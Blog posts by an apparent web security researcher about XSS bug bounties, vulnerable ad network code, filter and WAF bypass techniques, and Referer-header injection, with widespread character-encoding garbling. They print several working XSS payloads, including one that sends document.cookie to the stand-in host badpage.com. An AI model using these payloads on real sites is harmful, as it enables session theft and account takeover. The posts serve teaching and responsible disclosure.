Sometimes, itâs just my job to find vulnerabilities, and while thatâs kind of fun, itâs also a little unexciting compared to the thrill of finding bugs in other peopleâs software and getting an actual âthank youâ, whether monetarily or just a brief word.
About a year ago, I found a minor Cross-Site Scripting (XSS) flaw in a major companyâs web page, and while it wasnât a huge issue, I decided to report it, as I had a few years back with a similar issue in the same web site. I was pleased to find that the company was offering a bounty programme, and simply emailing them would submit my issue.
The first thing to notice, as with all XSS issues, is that there were protections in place that had to be got around. In this case, some special characters or sequences were being blocked. But not all. And itâs really telling that there are still many websites which have not implemented widespread input validation / output encoding as their XSS protection. So, while the WAF slowed me down even when I knew the flaw existed, it only added about 20 minutes to the exploit time. So, my example had to use âconfirm()â instead of âalert()â or âprompt()â. But really, if I was an attacker, my exploit wouldnât have any of those functions, and would probably include an encoded script that wouldnât be detected by the WAF either. WAFs are great for preventing specific attacks, but arenât a strong protection against an adversary with a little intelligence and understanding.
My email resulted in an answer that same day, less than an hour after my initial report. A simple âthank youâ, and âweâre forwarding this to our developersâ goes a long way to keeping a security researcher from idly playing with the thought of publishing their findings and moving on to the next game.
In under a week, I found that the original demo exploit was being blocked by the WAF â but if I replaced âonclickâ with âoclickâ, âonmouseoverâ with âomouseoverâ, and âconfirmâ with âcofirmâ, I found the blocking didnât get in the way. Granted, since those arenât real event handlers or JavaScript functions, I canât use those in a real exploit, but it does mean that once again, all the WAF does is block the original example of the attack, and it took only a few minutes again to come up with another exploit string.
If theyâd told me âhey, weâre putting in a WAF rule while we work on fixing the actual bugâ, I wouldnât have been so eager to grump back at them and say they hadnât fixed the issue by applying their WAF and by the way, hereâs another URL to exploit it. But they did at least respond to my grump and reassure me that, yes, they were still going to fix the application.
I heard nothing after that, until in February of this year, over six months later, I replied to the original thread and asked if the report qualified for a bounty, since I noticed that they had actually fixed the vulnerability.
No response. Thinking of writing this up as an example of how security researchers still get shafted by businesses â bear in mind that my approach is not to seek out bounties for reward, but that I really think itâs common courtesy to thank researchers for reporting to you rather than pwning your website and/or your customers.
About a month later, while looking into other things, I found that the company exists on HackerOne, where they run a bug bounty. This renewed my interest in seeing this fixed. So I reported the email exchange from earlier, noted that the bug was fixed, and asked if it constituted a rewardable finding. Again, a simple âthanks for the report, but this doesnât really rise to the level of a bountyâ is something Iâve been comfortable with from many companies (though it is nice when you do get something, even if itâs just a keychain or a t-shirt, or a bag full of stickers).
3/14: I got a reply the next day, indicating that âwe are investigatingâ.
3/28: Then nothing for two weeks, so I posted another response asking where things were going.
4/3: Then a week later, a response. âWeâre looking into this and will be in touch soon with an update.â
4/18: Me: Ping?
5/7: Me: Hey, how are we doing?
5/16: Anything happening?
5/18: Finally, over two months after my report to the company through HackerOne, and ten months after my original email to the first bug bounty address, itâs addressed.
5/19: The severity of the bug report is lowered (quite rightly, the questionnaire they used pushed me to a priority of âhighâ, which was by no means warranted). A very welcome bounty, and a bonus for my patience – unexpected but welcome, are issued.
The cheapest way to learn things is from someone elseâs mistakes. So I decided to share with my readers the things I picked up from this experience.
Here are a few other lessons Iâve picked up from bug bounties Iâve observed:
If you start a bug bounty, consider how ready you might be. Are you already fixing all the security bugs you can find for yourself? Are you at least fixing those bugs faster than you can find more? Do your developers actually know how to fix a security bug, or how to verify a vulnerability report? Do you know how to expand on an exploit, and find occurrences of the same class of bug? [If you donât, someone will milk your bounty programme by continually filing variations on the same basic flaw]
How many security vulnerabilities do you think you have? Multiply that by an order of magnitude or two. Now multiply that by the average bounty you expect to offer. Add the cost of the personnel who are going to handle incoming bugs, and the cost of the projects they could otherwise be engaged in. Add the cost of the developers, whose work will be interrupted to fix security bugs, and add the cost of the features that didnât get shipped on time before they were fixed. Sure, some of that is just a normal cost of doing business, when a security report could come at you out of the blue and interrupt development until itâs fixed, but starting a bug bounty paints a huge target on you.
Hiring a penetration tester, or renting a tool to scan for programming flaws, has a fixed cost â you can simply tell them how much youâre willing to pay, and theyâll work for that long. A bug bounty may result in multiple orders of magnitude more findings than you expected. Are you going to pay them all? What happens when your bounty programme runs out of money?
Finding bugs internally using bug bashes, software scanning tools or dedicated development staff, has a fixed cost, which is probably still smaller than the amount of money youâre considering on putting into that bounty programme.
Thatâs not to say bug bounties are always going to be uneconomical. At some point, in theory at least, your development staff will be sufficiently good at resolving and preventing security vulnerabilities that are discovered internally, that they will be running short of security bugs to fix. They still exist, of course, but theyâre more complex and harder to find. This is where it becomes economical to lure a bunch of suckers â excuse me, security researchers â to pound against your brick walls until one of them, either stronger or smarter than the others, finds the open window nobody saw, and reports it to you. And you give them a few hundred bucks â or a few thousand, if itâs a really good find â for the time that they and their friends spent hammering away in futility until that one successful exploit.
At that point, your bug bounty programme is actually the least expensive tool in your arsenal.
Randy Westergren posted a really great piece entitled âWidespread XSS Vulnerabilities in Ad Network Code Affecting Top Tier Publishers, Retailersâ
Go read it â Iâll wait.
The article triggered a lot of thoughts that Iâll enumerate here:
This was reported by SoftPedia as a ânew attackâ, but itâs really an old attack. This is just another way to execute DOM-based XSS.
That means that web sites are being attacked by old bugs, not because their own coding is bad, but because they choose to make money from advertising.
And because the advertising industry is just waaaay behind on securing their code, despite being effectively a widely-used framework across the web.
Youâve seen previously on my blog how I attacked Troy Huntâs blog through his advertising provider, and heâs not the first, or by any means the last, âvictimâ of my occasional searches for flaws.
Itâs often difficult to trace which ad provider is responsible for a piece of vulnerable code, and the hosting site may not realise the nature of their relationship and its impact on security. As a security researcher, itâs difficult to get traction on getting these vulnerabilities fixed.
Important note
Iâm trying to get one ad provider right now to fix their code. I reported a bug to them, they pointed out it was similar to the work Randy Westergren had written up.
So they are aware of the problem.
Itâs over a month later, and the sites I pointed out to them as proofs of concept are still vulnerable.
Partly, this is because I couldnât get a reliable repro as different ad providers loaded up, but itâs been two weeks since I sent them a reliable repro â which is still working.
Reported a month ago, reliable repro two weeks ago, and still vulnerable everywhere.
[If youâre defending a site and want to figure out which ad provider is at fault, inject a âdebugger
â statement into the payload, to have the debugger break at the line thatâs causing a problem. You may need to do this by replacing âprompt()
â or âalert()
â with â(function(){debugger})()
â â note that itâll only break into the debugger if you have the debugger open at the time.]
Randyâs attack example uses a symbol you wonât see at all in some web sites, but which you canât get away from in others. The â#â or âhashâ symbol, also known as ânumberâ or âhashâ. [Donât call it âpoundâ, please, thatâs a different symbol altogether, âÂŁâ] Hereâs his example:
http://nypost.com/#1'-alert(1)-'"-alert(1)-"
Different parts of the URL have different names. The âhttp:â part is the âprotocolâ, which tells the browser how to connect and what commands will likely work. â//nypost.com/â is the host part, and tells the browser where to connect to. Sometimes a port number is used â commonly, 80 or 443 â after the host name but before the terminating â/â of the host element. Anything after the host part, and before a question-mark or hash sign, is the âpathâ â in Randyâs example, the path is left out, indicating he wants the root page. An optional âqueryâ part follows the path, indicated by a question mark at its start, often taking up the rest of the URL. Finally, if a â#â character is encountered, this starts the âanchorâ part, which is everything from after the â#â character on to the end of the URL.
The âanchorâ has a couple of purposes, one by design, and one by evolution. The designed use is to tell the browser where to place the cursor â where to scroll to. I find this really handy if I want to draw someoneâs attention to a particular place in an article, rather than have them read the whole story. [It can also be used to trigger an onfocus event handler in some browsers]
The second use is for communication between components on the page, or even on other pages loaded in frames.
I want to emphasise this â and while Randy also mentioned it, I think many web site developers need to understand this when dealing with security.
The anchor tag is not sent to the server.
The anchor tag does not appear in your serverâs logs.
WAFs cannot filter the anchor tag.
If your site is being attacked through abuse of the anchor tag, you not only canât detect it ahead of time, you canât do basic forensic work to find out useful things such as âwhen did the attack startâ, âwhat sort of things was the attacker doingâ, âhow many attacks happenedâ, etc.
[Caveat: pedants will note that when browser code acts on the contents of the anchor tag, some of that action will go back to the server. Thatâs not the same as finding the bare URL in your log files.]
If you have an XSS that can be triggered by code in an anchor tag, it is a âDOM-based XSSâ flaw. This means that the exploit happens primarily (or only) in the userâs browser, and no filtering on the server side, or in the WAF (a traditional, but often unreliable, measure against XSS attacks), will protect you.
When trying out XSS attacks to find and fix them, you should try attacks in the anchor tag, in the query string, and in the path elements of the URL if at all possible, because they each will get parsed in different ways, and will demonstrate different bugs.
The construction Randy uses may seem a little odd:
"-alert(1)-"'-alert(1)-'
With some experience, you can look at this and note that itâs an attempt to inject JavaScript, not HTML, into a quoted string whose injection point doesnât properly (or at all) escape quotes. The two different quote styles will escape from quoted strings inside double quotes and single quotes alike (I like to put the number â2â in the alert that is escaped by the double quotes, so I know which quote is escaped).
Surely itâs invalid syntax?
While JavaScript knows that âstring minus voidâ isnât a valid operation, in order to discover the types of the two arguments to the âminusâ operator, it actually has to evaluate them. This is a usual side-effect of a dynamic language â in order to determine whether an operation is valid, its arguments have to be evaluated. Compiled languages are usually able to identify specific types at compile time, and tell you when you have an invalid operand.
So, now that we know you can use any operator in there â minus, times, plus, divide, and, or, etc â why choose the minus? Hereâs my reasoning: a plus sign in a URL is converted to a space. A divide (â/â) is often a path component, and like multiplication (â*â) is part of a comment sequence in JavaScript, â//â or â/*â, an â&â is often used to separate arguments in a query string, and a â|â for âorâ is possibly going to trigger different flaws such as command injection, and so is best saved for later.
Also, the minus sign is an unshifted character and quick to type.
There are so many other ways to exploit this â finishing the alert with a line-ending comment (â//â or â<–â), using âpromptâ or âconfirmâ instead of âalertâ, using JavaScript obfuscaters, etc, but this is a really good easy injection point.
Another JavaScript syntax abuse is simply to drop â</script>â in the middle of the JavaScript block and then start a new script block, or even just regular HTML. Remember that the HTML parser only hands off to the JavaScript parser once it has found a block between â<script âŠ>â and â</script âŠ>â tags. It doesnât matter if the closing tag is âwithinâ a JavaScript string, because the HTML parser doesnât know JavaScript.
Part of the challenge in repeating these attacks, demonstrating them to others, etc, is that thereâs no single ad provider, even on an individual web site.
Two visits to the same web site not only bring back different adverts, but they come through different pieces of code, injected in different ways.
If you donât capture your successful attack, it may not be possible to reproduce it.
Similarly, if you donât capture a malicious advert, it may not be possible to prove who provided it to you. I ran into this today with a âfake BSODâ malvert, which pretended to be describing a system error, and filled as much of my screen as it could with a large âalertâ dialog, which kept returning immediately, whenever it was dismissed, and which invited me to call for âtech supportâ to fix my system. Sadly, I wasnât tracing my every move, so I didnât get a chance to discover how this ad was delivered, and could only rage at the company hosting the page.
Clearly, ad providers need to improve their security. Until such time as they do so, a great protection is to use an ad-blocker. This may prevent you from seeing actual content at some sites, but you have to ask yourself if that content is worth the security risk of exposing yourself to adverts.
There is a valid argument to be made that ad blockers reduce the ability of content providers to make legitimate profit from their content.
But there is also a valid argument that ad blockers protect users from insecure adverts.
Finally, if youâre running a web site that makes its money from ads, you need to behave proactively to prevent your users from being targeted by rogue advertisers.
Iâm sure you believe that you have a strong, trusting relationship with the ad providers you have running ads on your web site.
Donât trust them. They are not a part of your dev team. They see your customers as livestock â product. Your goals are substantially different, and that means that you shouldnât allow them to write code that runs in your web siteâs security context.
What this means is that you should always embed those advertising providers inside an iframe of their own. If they give you code to run, and tell you itâs to create the iframe in which theyâll site, put that code in an iframe you host on a domain outside your main domain. Because you donât trust that code.
Why am I suggesting you do that? Because itâs the difference between allowing an advert attack to have limited control, and allowing it to have complete control, over your web site.
If I attack an ad in an iframe, I can modify the contents of the iframe, I can pop up a global alert, and I can send the user to a new page.
If I attack an ad â or its loading code â and it isnât in an iframe, I can still do all that, but I can also modify the entire page, read secret cookies, insert my own cookies, interact with the user as if I am the site hosting the ad, etc.
Hereâs the front page of a major website with a short script running through an advert with a bug in it.
[I like the tag at the bottom left]
Add security clauses in to your contracts , so that you can pull an ad provider immediately a security vulnerability is reported to you, and so that the ad providers are aware that you have an interest in the security and integrity of your page and your users. Ask for information on how they enforce security, and how they expect you to securely include them in your page.
[I am not a lawyer, so please talk with someone who is!]
Malverts â malicious advertising â is the term for an attacker getting an ad provider to deliver their attack code to your users, by signing up to provide an ad. Often this is done using apparent advertising copy related to current advertising campaigns, and can look incredibly legitimate. Sometimes, the attack code will be delayed, or region-specific, so an ad provider canât easily notice it when they review the campaign for inclusion in your web page.
Got a virus you want to distribute? Why write distribution code and try to trick a few people into running it, when for a few dollars, you can get an ad provider to distribute it for you to several thousand people on a popular web site for people who have money?
There are many reasons why Information Security hasnât had as big an impact as it deserves. Some are external â lack of funding, lack of concern, poor management, distractions from valuable tasks, etc, etc.
But the ones we inflict on ourselves are probably the most irritating. They make me really cross.
We shoot ourselves in the foot by confusing our customers between Cross-Site Scripting, Cross-Site Request Forgery & Cross-Frame Scripting.
â Alun Jones (@ftp_alun) February 26, 2016
OK, âcrossâ is an English term for âangryâ, or âirateâ, but as with many other English words, itâs got a few other meanings as well.
It can mean to wrong someone, or go against them â âI canât believe you crossed Fingers MacGeeâ.
It can mean to make the sign of a cross â âDid you just cross your fingers?â
It can mean a pair of items, intersecting one another â âIâm drinking at the sign of the Skull and Cross-bonesâ.
It can mean to breed two different subspecies into a third â âWhat do you get if you cross a mountaineer with a mosquito? Nothing, you canât cross a scaler and a vector.â
Or it can mean to traverse something â âI donât care what Darth Vader says, I always cross the road hereâ.
Itâs this last sense that InfoSec people seem obsessed about, to the extent that every other attack seems to require it as its first word.
These are just a list of the attacks at OWASP that begin with the word âCrossâ.
Yesterday I had a meeting to discuss how to address three bugs found in a scan, and I swear I spent more than half the meeting trying to ensure that the PM and the Developer in the room were both discussing the same bug. [And here, I paraphrase]
âHow long will it take you to fix the Cross-Frame Scripting bug?â
âWe just told you, itâs going to take a couple of days.â
âNo, that was for the Cross-Site Scripting bug. Iâm talking about the Cross-Frame Scripting issue.â
âOh, that should only take a couple of days, because all we need to do is encode the contents of the field.â
âNo, again, thatâs the Cross-Site Scripting bug. We already discussed that.â
âI wish youâd make it clear what youâre talking about.â
Yeah, me too.
The whole point of the word âCrossâ as used in the descriptions of these bugs is to indicate that someone is doing something they shouldnât â and in that respect, itâs pretty much a completely irrelevant word, because weâre already discussing attack types.
In many of these cases, the words âCross-Siteâ bring absolutely nothing to the discussion, and just make things confusing. Am I crossing a site from one page to another, or am I saying this attack occurs between sites? What if thereâs no other site involved, is that still a cross-site scripting attack? [Yes, but thatâs an irrelevant question, and by asking it, or thinking about asking/answering it, youâve reduced your mental processing abilities to handle the actual issue.]
Check yourself when you utter âcrossâ as the first word in the description of an attack, and ask if youâre communicating something of use, or just âsounding like a proper InfoSec toolâ. Consider whether thereâs a better term to use.
Iâve previously argued that âCross-Site Scriptingâ is really a poor term for the conflation of HTML Injection and JavaScript Injection.
Cross-Frame Scripting is really Click-Jacking (and yes, that doesnât exclude clickjacking activities done by a keyboard or other non-mouse source).
Cross-Site Request Forgery is more of a Forced Action â an attacker can guess what URL would cause an action without further user input, and can cause a user to visit that URL in a hidden manner.
Cross-Site History Manipulation is more of a browser failure to protect SOP â Iâm not an expert in that field, so Iâll leave it to them to figure out a non-confusing name.
Cross-Site Tracing is just getting silly â itâs Cross-Site Scripting (excuse me, HTML Injection) using the TRACE verb instead of the GET verb. If you allow TRACE, youâve got bigger problems than XSS.
Cross-User Defacement crosses all the way into crosstalk, requiring as it does that two users be sharing the same TCP connection with no adequate delineation between them. This isnât really common enough to need a name that gets capitalised. Itâs HTTP Response-Splitting over a shared proxy with shitty user segregation.
I donât remotely anticipate that Iâll change the names people give to these vulnerabilities in scanning tools or in pen-test reports.
But I do hope youâll be able to use these to stop confusion in its tracks, as I did:
âNever mind cross-whatever, letâs talk about how long itâs going to take you to address the clickjacking issue.â
Hereâs the TL;DR version of the web post:
Prevent or interrupt confusion by referring to bugs using the following non-confusing terms:
Confusing | Not Confusing Much, Probably |
Cross-Frame Scripting | Clickjacking |
Cross-Site History Manipulation | [Not common enough to name] |
Cross-Site Tracing | TRACE is enabled |
Cross-Site Request Forgery | Forced User Action |
Cross-Site Scripting | HTML Injection JavaScript Injection |
Cross-User Defacement | Crappy proxy server |
Apologies for not having written one of these in a while, but I find that one of the challenges here is to not release details about vulnerable sites while theyâre still vulnerable â and it can take oh, so long for web developers to get around to fixing these vulnerabilities.
And when they do, often thereâs more work to be done, as the fixes are incomplete, incorrect, or occasionally worse than the original problem.
Sometimes, though, the time goes so slowly, and the world moves on in such a way that you realise nobodyâs looking for the vulnerable site, so publishing details of its flaws without publishing details of its identity, should be completely safe.
So, what sort of attack is actively aided by the website?
My favourite âhelped by the websiteâ issues are error messages which will politely inform you how your attack failed, and occasionally what you can do to fix it.
Hereâs an SQL example:
OK, so now I know I have a SQL statement that contains the sequence â' order by type asc, sequence desc
â â that tells me quite a lot. There are two fields called âtypeâ and âsequenceâ. And my single injected quote was enough to demonstrate the presence of SQL injection.
What about XSS help?
Thereâs a few web sites out there who will help you by telling you which characters they canât handle in their search fields:
Now, the question isnât âwhat characters can I use to attack the site?â, but âhow do I get those characters into the site. [Usually itâs as simple as typing them into the URL instead of using the text box, sometimes itâs simply a matter of encoding]
On the subject of encoding and decoding, I generally advise developers that they should document interface contracts between modules in their code, describing what the data is, what format itâs in, and what isomorphic mapping they have used to encode the data so that it is not possible to confuse it with its surrounding delimiters or code, and so that itâs possible to get the original string back.
An isomorphism, or 1:1 (âone to oneâ) mapping, in data encoding terms, is a means of making sure that each output can only correspond to one possible input, and vice versa.
Without these contracts, you find that developers are aware that data sometimes arrives in an encoded fashion, and they will do whatever it takes to decode that data. Data arrives encoded? Decode it. Data arrives doubly-encoded? Decode it again. Heck, take the easy way out, as this section of code did:
var input, output;
parms = document.location.search.substr(1).split("&");
input = parms[1];
while (input != output) {
output = input;
input = unescape(output);
}
[Thatâs from memory, so I apologise if itâs a little incorrect in many, many other ways as well.]
Yes, the programmer had decided to decode the input string until he got back a string that was unchanged.
This meant that an attacker could simply provide a multiply-encoded attack sequence which gets past any filters you have, such as WAFs and the like, and which the application happily decodes for you.
Granted, I donât think WAFs are much good, compared to actually fixing the code, but they can give you a momentâs piece to fix code, as long as your code doesnât do things to actively prevent the WAF from being able to help.
This has essentially the same effect as described above. The request target for an HTTP request may be percent-encoded, and when it is, the server is required to treat it equivalently to the decoded target. This can sometimes have the effect that each server in a multi-tiered service will decode the HTTP request once, achieving the multiple-decode WAF traversal I talk about above.
OK, thatâs illustrative, and it illustrates that Google doesnât fall for this crap.
But itâs interesting how youâll find occasionally that such a correction results in executing code.
When finding XSS in searches, we often concentrate on failed searches â after all, in most product catalogues, there isnât an item called â<script>prompt()</script>â â unless we put it there on a previous attack.
But often the more complex (and easily attacked) code is in the successful search results â so we want to trigger that page.
Sometimes thereâs something called âscriptâ, so we squeak that by (thereâs a band called âThe Scriptâ, and very often writing on things is desribed as being in a âscriptâ font), but now we have to build Javascript with other terms that match the item on display when we find âscriptâ. Fortunately, thereâs a list of words that most search engines are trained to ignore â they are called âstopwordsâ. These are words that donât impact the search at all, such as âtheâ, âofâ, âtoâ, âandâ, âbyâ, etc â words that occur in such a large number of matching items that it makes no sense to allow people to search on those words. Often colours will appear in the list of stopwords, along with generic descriptions of items in the catalogue (âshirtâ, âbookâ, etc).
Well, âalertâ is simply âandâ[0]+âblueâ[1]+âtheâ[2]+âorâ[1]+âtheâ[0], so you can build function names quickly from stopwords. Once you have String.FromCharCode as a function object, you can create many more strings and functions more quickly. For an extreme example of this kind of âbuilding Javascript from minimal charactersâ, see this page on how to create all JavaScript from eight basic characters (none of which are alphabetical!)
âNotwordsâ arenât a thing, but made the title seem more interesting â sometimes itâd be nice to slip in a string that isnât a stopword, and isnât going to be found in the search results. Well, many search functions have a grammar that allow us to say things like âIâd like all your teapots except for the ones made from steelâ â or more briefly, âteapot !steelâ.
How does this help us execute an attack?
Well, we could just as easily search for â<script> !prompt() </script>â â valid JavaScript syntax, which means ârun the prompt() function, and return the negation of its resultâ. Well, too late, weâve run our prompt command (or other commands). I even had âbook !<script> !prompt()// !</script>â work on one occasion.
So, now that weâve seen some examples of the server or its application helping us to exploit an XSS, what about the browser?
One of the fun things I see a lot is servers blocking XSS by ensuring that you canât enter a complete HTML tag except for the ones they approve of.
So, if I canât put that closing â>â in my attack, what am I to do? I canât just leave it out.
Well, strange things happen when you do. Largely because most web pages are already littered with closing angle brackets â theyâre designed to close other tags, of course, not the one youâve put in, but there they are anyway.
So, you inject â<script>prompt()</script>â and the server refuses you. You try â<script prompt() </scriptâ and itâs allowed, but canât execute.
So, instead, try a single tag, like â<img src=x onerror=prompt()>â â itâs rejected, because itâs a complete tag, so just drop off the terminating angle bracket. â<img src=x onerror=prompt()â â so that the next tag doesnât interfere, add an extra space, or an âx=â:
<img src=x onerror=prompt() x=
If that gets injected into a <p> tag, itâll appear as this:
<p><img src=x onerror=prompt() x=</p>
Howâs your browser going to interpret that? Simple â open p tag, open img tag with src=x, onerror=prompt() and some attribute called âxâ, whose value is â</pâ.
Occasionally, browser heuristics and documented standards will be just as helpful to you as the presence of characters in the web page.
Canât get a â/â character into the page? Then you canât close a <script> tag. Well, thatâs OK, because the <svg> tag can include scripts, and is documented to end at the next HTML tag that isnât valid in SVG. So⊠â<svg><script>prompt()<p>â will happily execute as if youâd provided the complete â<svg><script>prompt()</script></svg><p>â
There are many other examples where the browser will use some form of heuristic to âguessâ what you meant, or rather to guess what the server meant with the code it sends to the browser with your injected data. See what happens when you leave your attack half-closed.
When injecting script, you often want to comment the remaining line after your injection, so it isnât parsed â a failing parse results in none of your injected code being executed.
So, you try to inject â//â to make the rest of the line a comment. Too bad, all â/â characters are encoded or discarded.
Well, did you know that JavaScript in HTML treats â<!ââ as a perfectly valid equivalent?
Try attacks in different browsers, they each behave in subtly different ways.
Firefox doesnât have an XSS filter. So it wonât prevent XSS attacks that way.
IE 11 doesnât encode URI elements, so will sometimes work when your attack would otherwise be encoded.
Chrome â well, I donât use Chrome often enough to comment on its quirks. Too irritated with it trying to install on my system through Adobe Flash updates.
Well, I think thatâs enough for now.
My buddy Troy Hunt has a popular PluralSight training class called âHack Yourself Firstâ. This is excellent advice, as it addresses multiple ideas:
Plenty of other reasons, Iâm sure. Maybe I should watch his training.
Every now and again, though, Iâll hack my friends as well. There are a few reasons for this, too:
Such is the way with my recent visit to troyhunt.com â Iâve been researching reflected XSS issues caused by including script in the Referrer header.
Actually, thereâs two places that hold the referrer, and itâs important to know the difference between them, because they get attacked in different ways, and attacks can be simulated in different ways.
The Referrer header (actually misspelled as âRefererâ) is an HTTP header that the browser sends as part of its request for a new web page. The Referrer header contains a URL to the old page that the browser had loaded and which triggered the browser to fetch the new page.
There are many rules as to when this Referrer header can, and canât, be sent. It canât be sent if the user typed a URL. It canât be sent if the target is HTTP, but the source was HTTPS. But there are still enough places it can be sent that the contents of the Referer header are a source of significant security concern â and why you shouldnât EVER put sensitive data in the URL or query parameters, even when sending to an HTTPS destination. Even when RESTful.
Forging the Referer when attacking a site is a simple matter of opening up Fiddler (or your other favourite scriptable proxy) and adding a new automatic rule to your CustomRules.js, something like this:
// AMJ
if (oSession.oRequest.headers.Exists("Referer"))
{
if (oSession.oRequest.headers["Referer"].Contains("?"))
oSession.oRequest.headers["Referer"] += "&\"-prompt()-\"";
else
oSession.oRequest.headers["Referer"] += "?\"-prompt()-\"";
}
else
oSession.oRequest.headers["Referer"] = "http://www.example.com?\"-prompt()-\"";
Something like this code was in place when I visited other recently reported vulnerable sites, but Troyâs I hit manually. Because fun.
The other referrer is in Javascript, the document.referrer field. I couldnât find any rules about when this is, or isnât available. That suggests itâs available for use even in cases where the HTTP Referer header believes it is not safe to do so, at least in some browser or other.
Forging this is harder, and Iâm not going to delve into it. I want you to know about it in case youâve used the Referer header, and referrer-vulnerable code isnât triggering. Avoids tearing your hair out.
So, lately Iâve been testing sites with a URL ending in the magic string ?"-prompt()-"
– and happened to try it at Troyâs site, among others.
Iâd seen a pattern of adsafeprotected.com advertising being vulnerable to this issue. [Itâs not the only one by any means, but perhaps the most prevalent]. Itâs difficult accurately reproducing this issue, because advertising mediators will send you to different advertisers each time you visit a site.
And so it was with great surprise that I tried this on Troyâs site and got an immediate hit. Partly because I know Troy will have already tried this on his own site.
Through a URL parameter, Iâm injecting script into a hosted component that unwisely includes the Referer headerâs contents in its JavaScript without encoding and/or quoting it first.
I hear that one all the time â no big deal, itâs only a reflected XSS, the most you can do with this is to abuse yourself.
Kind of, yeah. Hereâs some of my reasons why Reflected XSS is important:
So, for multiple values of âselfâ outside the attacker, you can abuse yourself with Reflected XSS.
With all security research, there comes a time when you want to make use of your findings, whether to garner yourself more publicity, or to earn a paycheck, or simply to notify the vendor and have them fix something. I prefer the latter, when itâs possible / easy.
Usually, the key is to find an email address at the vulnerable domain â but security@adsafeprotected.com wasnât working, and I couldnât find any hints of an actual web site at adsafeprotected.com for me to go look at.
Troy was able to start from the other direction â as the owner of a site showing these adverts, he contacted the advertising agent that puts ads onto his site, and get them to fix the issue.
âDeveloper Mediaâ was the name of the group, and their guy Chris quickly got onto the issue, as did Jamie from Integral Ads, the owners of adsafeprotected.com. Developer Media pulled adsafeprotected as a source of ads, and Integral Ads fixed their code.
Sites that were previously vulnerable are now not vulnerable â at least not through that exact attack.
I count that as a win.
Finally, some learning.
Your partners can bring you as much risk as your own developers and your own code. You may be able to transfer risk to them, but you canât transfer reputational risk as easily. With different notifications, Troyâs brand could have been substantially damaged, as could Developer Mediaâs and Integral Adsâ. As it is, they all responded quickly, quietly and appropriately, reducing the reputational impact.
[As for my own reputational impact â youâre reading this blog entry, so thatâs a positive.]
This issue was easy to find. So itâs probably been in use for a while by the bad guys. There are issues like this at multiple other sites, not related to adsafeprotected.
So you should test your site and see if itâs vulnerable to this, or similar, code. If you donât feel like youâll do a good job, employ a penetration tester or two.
Thereâs a thin line between âparanoiaâ and âgood security practiceâ. Troyâs blog uses good security practice, by ensuring that all adverts are inside an iframe, where they canât execute in Troyâs security context. While I could redirect his users, perhaps to a malicious or competing site, I wasnât able to read his usersâ cookies, or modify content on his blog.
There were many other hosts using adsafeprotected without being in an iframe.
Make it a policy that all externally hosted content (beyond images) is required to be inside of an iframe. This acts like a firewall between your partners and you.
If youâre a developer, you need to have a security contact, and that contact must be findable from any angle of approach. Security researchers will not spend much time looking for your contact information.
Ideally, for each domain you handle, have the address security@example.com (where you replace âexample.comâ with your domain) point to a monitored email address. This will be the FIRST thing a security researcher will try when contacting you. Finding the âContact Usâ link on your web page and filling out a form is farther down on the list of things a researcher will do. Such a researcher usually has multiple findings theyâre working on, and theyâll move on to notifying someone else rather than spend time looking for how to notify you.
This just makes it more ironic when the inevitable vulnerability is found.
As Troy notes, I did have to disable the XSS Filter in order to see this vuln happen.
That doesnât make the vuln any less important to fix â all it means is that to exploit it, I have to find customers who have also disabled the XSS Filter, or find a way to evade the filter.
There are many sites advising users how to disable the XSS Filter, for various (mostly specious) reasons, and there are new ways every day to evade the filter.
The web ad industry is at a crisis point, from my perspective.
Flash has what appear to be daily vulnerabilities, and yet itâs still seen to be the medium of choice for online advertising.
Even without vulnerabilities in Flash, its programmability lends it to being used by bad guys to distribute malicious software. There are logic-based and time-based exploits (display a âgoodâ ad when inspected by the ad hosting provider; display a bad ad, or do something malicious when displayed on customersâ computers) which attackers will use to ensure that their ad passes rigorous inspection, but still deploys bad code to end users.
Any ad that uses JavaScript is susceptible to common vulnerability methods.
Ad blockers are being run by more and more people â even institutions (one college got back 40% of their network bandwidth by employing ad blocking).
Web sites need to be funded. If youâre not paying for the content, someone is. How is that to be done except through advertising? [Maybe you have a good idea that hasnât been tried yet]
Iâll admit, I was bored when I found the bug on Troyâs site on a weekend. I decided to contact him straight away, and he responded immediately.
This led to Developer Media being contacted late on a Sunday.
This is not exactly friendly of me and Troy â but at least we didnât publish, and left it to the developers to decide whether to treat this as a âfire drillâ.
A good reason, indeed, to use responsible / coordinated disclosure, and make sure that you donât publish until teams are actively working on / have resolved the problem.
There are people using old and poorly configured browsers everywhere. Perhaps they make up .1% of your users. If you have 100,000 users, thatâs a hundred people who will be affected by issues with those browsers.
Firefox escaped because it encoded the quote characters to %22, and the server at adsafeprotected didnât decode them. Technically, adsafeprotectedâs server is not RFC compliant because of this, so Firefox isnât really protecting anyone here.
Chrome escaped because it encoded the quote characters AND has an XSS filter to block things like my attack. This is not 100% safe, and can be disabled easily by the user.
Internet Explorer up to version 11 escaped if you leave the XSS Filter turned on.
Microsoft Edge in Windows 10 escaped because it encodes the quote characters and has a robust XSS Filter that, as far as I can tell, you canât turn off.
All these XSS filters can be turned off by setting a header in network traffic.
Nobody would do that.
Until such time as one of these browsers has a significant flaw in their XSS filter.
So, donât rely on the XSS Filter to protect you â it canât be complete, and it may wind up being disabled.
First, a disclaimer for the TL;DR crowd â data attributes alone will not stop all XSS, mine or anyone elseâs. You have to apply them correctly, and use them properly.
However, I think youâll agree with me that itâs a great way to store and reference data in a page, and that if you only handle user data in correctly encoded data attributes, you have a greatly-reduced exposure to XSS, and can actually reduce your exposure to zero.
Next, a reminder about my theory of XSS â that there are four parts to an XSS attack â Injection, Escape, Attack and Cleanup. Injection is necessary and therefore canât be blocked, Attacks are too varied to block, and Cleanup isnât always required for an attack to succeed. Clearly, then, the Escape is the part of the XSS attack quartet that you can block.
Now letâs set up the code weâre trying to protect – say we want to have a user-input value accessible in JavaScript code. Maybe weâre passing a search query to Omniture (by far the majority of JavaScript Injection XSS issues I find). Hereâs how it often looks:
<script>
s.prop1="mysite.com";
s.prop2="SEARCH-STRING";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//â>
</script>
Letâs suppose that âSEARCH-STRINGâ above is the string for which I searched.
I can inject my code as a search for:
"-window.open("//badpage.com/"+document.cookie,"_top")-"
The second line then becomes:
s.prop2=""-window.open("//badpage.com/"+document.cookie,"_top")-"";
Yes, I know you canât subtract two strings, but JavaScript doesnât know that until itâs evaluated the window.open()
function, and by then itâs too late, because itâs already executed the bad thing. A more sensible language would have thrown an error at compile time, but this is just another reason for security guys to hate dynamic languages.
A data attribute is an attribute in an HTML tag, whose name begins with the word âdataâ and a hypen.
